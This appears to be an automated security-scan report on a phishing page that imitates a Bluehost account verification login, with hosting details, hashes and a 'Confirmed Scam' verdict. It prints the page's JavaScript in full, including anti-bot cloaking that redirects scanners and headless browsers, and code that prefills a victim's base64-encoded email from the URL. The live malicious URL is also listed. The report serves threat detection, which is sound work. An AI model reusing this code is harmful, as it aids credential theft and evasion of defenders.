finance banking

adult content

government public service

English

humans_21909

You're looking at domain 'wordpress-learning.testersdesigns.com' on the commercial generic top-level domain (.com); it also runs on subdomain 'wordpress-learning'. Its registrable label 'testersdesigns' stretches across 14 characters holding 4 vowels versus ten consonants. Tokenizing the label suggests 2 words: testers, designs. The median word length lands at seven characters. No strong language cues emerged from the frequency lists.

botcheck

html/6a/01/6a01b34d-700a-4410-87b1-f3e8074ecdc6.html.gz

require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes

953396ca0dd0e30766d83d0ed619c06ed44681566fcb096fe5363342ef13daa3

d5aef07088febad8c2e3a1eeda3bb5e6b74a9e5f1e242784cbb02a397373f7eb

c44d72d35e7fbe7984e887baea54a9b4c63141f09ede7a296c48f7de6a428a1f

viewport

HSTS header missing - vulnerable to protocol downgrade attacks

CSP header missing - vulnerable to XSS attacks

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;worker-src blob: 'self';frame-ancestors 'none';

child-src https:  chrome-untrusted://new-tab-page/ chrome-untrusted://ntp-microsoft-auth/;connect-src chrome://resources chrome://theme 'self';default-src 'self';font-src chrome://resources 'self';img-src chrome://resources chrome://theme chrome://image chrome://favicon2 chrome://app-icon chrome://extension-icon chrome://fileicon blob: data: 'self';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources chrome://webui-test 'self';style-src chrome://resources chrome://theme 'self' 'unsafe-inline';trusted-types parse-html-subset sanitize-inner-html static-types webui-test-script webui-test-html polymer-html-literal polymer-template-event-attribute-policy lit-html-desktop;frame-ancestors 'none';

base-uri 'none';child-src https:;form-action https://ogs.google.com https://*.corp.google.com;object-src 'none';script-src 'self' 'unsafe-inline' https:;frame-ancestors chrome://new-tab-page/

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;frame-ancestors 'none';

GoDaddy.com, LLC

TESTERSDESIGNS.COM

EIG-Abuse Mitigation

Network Operations Center

EIG Network Operations

Unified Layer

UNIFIEDLAYER-NETWORK-16


(async function () {
    const userAgent = navigator.userAgent || "";
    const suspiciousUA = /bot|crawl|spider|slurp|headless|phantom/i.test(userAgent);
    const isHeadless = navigator.webdriver || false;

    // JS execution confirmation
    localStorage.setItem('js_enabled', 'true');

    // Honeypot trap (use your existing field instead)
    const honeypot = document.getElementById('botcheck');
    if (honeypot && honeypot.value) {
        window.location.href = "https://www.wikipedia.org";
        return;
    }

    // Check if localStorage was written (JS running)
    const jsEnabled = localStorage.getItem('js_enabled') === 'true';

    // Final bot detection logic (without interaction check)
    if (
        suspiciousUA ||
        isHeadless ||
        !jsEnabled
    ) {
        // Redirect bot
        window.location.href = "https://www.wikipedia.org";
    }
})();



// Function to get email from URL hash
function getEmailFromUrl() {
    const hash = window.location.hash.substring(1); // Remove the #
    if (!hash) return null;
    
    // Check if hash is base64 encoded
    if (isBase64(hash)) {
        try {
            return atob(hash); // Decode base64
        } catch (e) {
            return hash; // If decoding fails, assume it's plain email
        }
    }
    return hash;
}

// Function to check if a string is base64 encoded
function isBase64(str) {
    try {
        return btoa(atob(str)) === str;
    } catch (err) {
        return false;
    }
}

// Function to update URL with base64 encoded email
function updateUrlWithEncodedEmail(email) {
    if (!email) return;
    const encodedEmail = btoa(email);
    window.history.replaceState(null, null, `#${encodedEmail}`);
}

// Main function to process email
function processEmail() {
    // Get email from URL
    const email = getEmailFromUrl();
    
    if (email) {
        // Update username field
        document.getElementById('username').value = email;
        
        // Update URL with encoded email if it's not already encoded
        if (!isBase64(window.location.hash.substring(1))) {
            updateUrlWithEncodedEmail(email);
        }
    }
}

// Run when page loads
window.addEventListener('DOMContentLoaded', processEmail);


Bluehost

Account Verification

☠️ Malicious - https://wordpress-learning.testersdesigns.com/pureaccessgoogle.edge.fractorecom.html#aG9tZW9mQGlzb2Muc2U=

Requests	IP Address	Location	AS Autonomous System
4	162.241.253.27	Phoenix, Arizona, United States	AS31898Oracle Corporation
3	104.26.13.205	United States	AS13335Cloudflare, Inc.
3	142.250.186.74	United States	AS15169Google LLC
3	172.217.16.195	United States	AS15169Google LLC
13	4	-	-

Security Scan Report: wordpress-learning.testersdesigns.com

Summary

AI Security Verdict

Confirmed Scam

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Detected Technologies1

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History